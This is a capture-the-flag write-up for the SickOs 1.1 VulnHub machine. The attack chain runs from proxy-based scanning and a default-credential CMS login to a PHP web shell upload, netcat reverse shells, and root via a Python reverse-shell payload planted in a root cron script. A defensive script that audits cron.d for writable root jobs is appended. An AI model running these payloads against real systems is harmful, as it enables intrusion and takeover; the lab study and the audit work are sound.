SickOs1.1 Writeup

Here is a quick write-up for SickOs 1.1 from the vulnhub.com site:
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk

Run a quick Nmap scan to see what we have to work with:
nmap -Pn 192.168.18.146

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

The squid proxy port looks interesting, so I configure my browser to use the proxy. Once configured I am able to access the internet. Let's try accessing the local IP through the proxy.

[Screenshot]

OK, not much to go on here; looking at the source of the page shows no clues.
Let's run a quick directory scan using dirb and see if anything interesting shows up.

dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Dec  8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.18.146/ ----
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)

-----------------
END_TIME: Tue Dec  8 07:12:17 2015
DOWNLOADED: 4592 - FOUND: 7

Check out robots.txt:

User-agent: *
Disallow: /
Dissalow: /wolfcms

/wolfcms looks interesting; opening it in a browser shows:

[Screenshot 2]

I have never heard of wolfcms. I check out exploit-db and see some vulnerabilities, but most seem to require an authenticated user. So let's download the source for wolfcms to see the file structure. From the source I see several directories such as images etc. Looking around those, nothing exciting shows up. So we bring up the admin login page determined from the source code.

[Screenshot 3]

Just try the common admin/admin and we are in.

[Screenshot 4]

Now let's see if we can upload my preferred PHP shell, b374k, to get CLI access. Let's put it in the images directory.

[Screenshot 5]

Now let's see if we can access the newly uploaded file.

[Screenshot 6]

We are now in as the www-data user. From b374k I create a reverse shell back to myself to obtain shell access.

/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>

Let's look at services and see if anything stands out.

/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   3536  1892 ?        Ss   20:30   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    20:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    20:30   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    20:30   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    20:30   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   20:30   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    20:30   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   20:30   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   20:30   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   20:30   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   20:30   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   20:30   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   20:30   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    20:30   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   20:30   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   20:30   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    20:30   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    20:30   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   20:30   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   20:30   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    20:30   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    20:30   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   20:30   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   20:30   0:00 [kthrotld]
root        45  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S<   20:30   0:00 [dm_bufio_cache]
root        69  0.0  0.0      0     0 ?        S<   20:30   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   20:30   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:2]
root       213  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_2]
root       214  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_3]
root       215  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_4]
root       217  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt_poll_0]
root       222  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_5]
root       223  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt/0]
root       224  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_6]
root       226  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_7]
root       228  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_8]
root       229  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_9]
root       230  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_10]
root       233  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_11]
root       234  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_12]
root       235  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_13]
root       236  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_14]
root       237  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_15]
root       238  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_16]
root       239  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_17]
root       240  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_18]
root       241  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_19]
root       242  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_20]
root       243  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_21]
root       244  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_22]
root       245  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_23]
root       246  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_24]
root       247  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_25]
root       248  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_26]
root       249  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_27]
root       250  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_28]
root       251  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_29]
root       252  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_30]
root       253  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_31]
root       283  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_32]
root       374  0.0  0.0      0     0 ?        S    20:30   0:00 [jbd2/sda1-8]
root       375  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-rsv-conver]
root       376  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-unrsv-conv]
root       470  0.0  0.0   2832   608 ?        S    20:30   0:00 upstart-udev-bridge --daemon
root       473  0.0  0.1   3100  1332 ?        Ss   20:30   0:00 /sbin/udevd --daemon
102        559  0.0  0.0   3256   888 ?        Ss   20:30   0:00 dbus-daemon --system --fork --activation=upstart
syslog     563  0.0  0.1  30164  1580 ?        Sl   20:30   0:00 rsyslogd -c5
root       574  0.0  0.0      0     0 ?        S<   20:30   0:00 [ttm_swap]
root       641  0.0  0.0   2976   764 ?        S    20:30   0:00 /sbin/udevd --daemon
root       642  0.0  0.0   3096   880 ?        S    20:30   0:00 /sbin/udevd --daemon
root       710  0.0  0.0      0     0 ?        S<   20:30   0:00 [kpsmoused]
root       769  0.0  0.0   2844   348 ?        S    20:30   0:00 upstart-socket-bridge --daemon
root       849  0.0  0.0   2924   404 ?        Ss   20:30   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       895  0.0  0.2   6680  2408 ?        Ss   20:30   0:00 /usr/sbin/sshd -D
root      1016  0.0  0.0   4628   844 tty4     Ss+  20:30   0:00 /sbin/getty -8 38400 tty4
root      1021  0.0  0.0   4628   844 tty5     Ss+  20:30   0:00 /sbin/getty -8 38400 tty5
root      1028  0.0  0.0   4628   844 tty2     Ss+  20:30   0:00 /sbin/getty -8 38400 tty2
root      1029  0.0  0.0   4628   848 tty3     Ss+  20:30   0:00 /sbin/getty -8 38400 tty3
root      1036  0.0  0.0   4628   856 tty6     Ss+  20:30   0:00 /sbin/getty -8 38400 tty6
proxy     1061  0.0  1.4  40200 15124 ?        Ss   20:30   0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root      1062  0.0  0.0   2172   624 ?        Ss   20:30   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1063  0.0  0.0   2616   932 ?        Ss   20:30   0:00 cron
daemon    1064  0.0  0.0   2468   352 ?        Ss   20:30   0:00 atd
whoopsie  1084  0.0  0.3  24468  3768 ?        Ssl  20:30   0:00 whoopsie
mysql     1107  0.0  3.3 326184 33976 ?        Ssl  20:30   0:01 /usr/sbin/mysqld
proxy     1125  0.0  0.0   3220   612 ?        Ss   20:30   0:00 (unlinkd)
root      1136  0.0  0.7  37900  7656 ?        Ss   20:30   0:00 /usr/sbin/apache2 -k start
www-data  1172  0.0  0.7  38864  7776 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
www-data  1174  0.0  0.9  39804 10020 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
root      1185  0.0  0.0   4628   848 tty1     Ss+  20:30   0:00 /sbin/getty -8 38400 tty1
www-data  1379  0.0  0.9  40024  9548 ?        S    20:43   0:00 /usr/sbin/apache2 -k start
www-data  1550  0.0  0.8  39768  9052 ?        S    21:36   0:00 /usr/sbin/apache2 -k start
root      1554  0.0  0.0      0     0 ?        S    21:37   0:00 [kworker/u16:1]
www-data  1596  0.0  0.9  40304  9656 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1597  0.0  0.8  40412  8552 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1602  0.0  0.9  40812 10188 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1614  0.0  0.9  41964 10224 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1615  0.0  1.0  41312 10532 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1616  0.0  0.8  40412  8644 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
root      1666  0.0  0.0      0     0 ?        S    21:55   0:00 [kworker/u16:0]
www-data  1690  0.0  0.0   2232   544 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1691  0.0  0.0   2232   284 ?        S    22:00   0:00 /bin/sh -i
root      1694  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/u16:2]
www-data  1695  0.0  0.0   2232   540 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1696  0.0  0.0   2232   280 ?        S    22:00   0:00 /bin/sh -i
www-data  1767  0.0  0.0   2232   540 ?        S    22:01   0:00 sh -c ./b374k_rs 13123 2>&1
www-data  1768  0.0  0.0   2000   284 ?        S    22:01   0:00 ./b374k_rs 13123
www-data  1775  0.0  0.0   2232   544 ?        S    22:03   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1776  0.0  0.0   2232   560 ?        S    22:03   0:00 /bin/sh -i
www-data  1790  0.0  0.1   2860  1044 ?        R    22:05   0:00 ps -aux

whoopsie looks odd.

Let's take a look at the wolfcms config file.
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

Nice. Looking through the MySQL tables, nothing interesting pops out. I tried the root password via SSH with no luck. So let's look around a bit.

I see a file in /var/www called connect.py:
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

Well, that looks like a clue. Let's look for something that could launch this, like cron.

I found a file under /etc/cron.d called automate that runs connect.py as root:

* * * * * root /usr/bin/python /var/www/connect.py
Let's edit the file to see if we can get a reverse shell via the root user.

Modified automate:

#!/usr/bin/python

import socket,subprocess,os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.18.181", 1234))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])


Now start the nc listener:

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can't access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
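
Added example, not from this write-up or the SickOs VM: a small audit script for the weakness that gave root above, a cron.d entry running as root that executes a script a non-root user can modify. It parses cron.d-format lines, resolves the script behind an interpreter such as /usr/bin/python, and flags it when it is owned by an untrusted uid or is group/world-writable; the sample cron.d and scripts it checks are constructed in a temporary directory, and the file names and paths are mine, not the VM's.

```python
import os
import tempfile

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "php"}

def script_path(command):
    # '/usr/bin/python /var/www/connect.py' -> '/var/www/connect.py'; a bare path is itself
    argv = command.split()
    if len(argv) > 1 and os.path.basename(argv[0]) in INTERPRETERS:
        return argv[1]
    return argv[0] if argv else ""

def audit_cron_dir(cron_dir, trusted_uids=(0,)):
    # Flag root jobs whose script is owned by an untrusted uid or writable by group/others
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        with open(os.path.join(cron_dir, name)) as fh:
            for line in fh:
                line = line.strip()
                # skip blanks, comments and VAR=value lines (PATH=..., SHELL=...)
                if not line or line.startswith("#") or "=" in line.split()[0]:
                    continue
                fields = line.split(None, 6)  # five time fields, user, command
                script = script_path(fields[6]) if len(fields) == 7 else ""
                if len(fields) < 7 or fields[5] != "root" or not os.path.isfile(script):
                    continue
                st = os.stat(script)
                if st.st_uid not in trusted_uids:
                    findings.append((name, script, "owned by uid %d" % st.st_uid))
                elif st.st_mode & 0o022:  # group- or world-writable
                    findings.append((name, script, "writable by group/others"))
    return findings

def run_demo():
    # Constructed cron.d: one entry like automate (world-writable script) and one sound one;
    # the current uid is trusted so the sample is judged on mode bits alone
    base = tempfile.mkdtemp()
    cron_dir = os.path.join(base, "cron.d")
    os.makedirs(cron_dir)
    weak, sound = os.path.join(base, "connect.py"), os.path.join(base, "backup.sh")
    for path, mode in ((weak, 0o666), (sound, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    with open(os.path.join(cron_dir, "automate"), "w") as fh:
        fh.write("# every minute\nPATH=/usr/bin:/bin\n* * * * * root /usr/bin/python %s\n" % weak)
    with open(os.path.join(cron_dir, "backup"), "w") as fh:
        fh.write("0 3 * * * root %s --full\n" % sound)
    return audit_cron_dir(cron_dir, trusted_uids=(0, os.getuid()))
```

Against a real host, call audit_cron_dir("/etc/cron.d") with the default trusted uid so anything not owned by root is reported as well.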

This was a lot of fun. Thanks for creating it, D4rk!
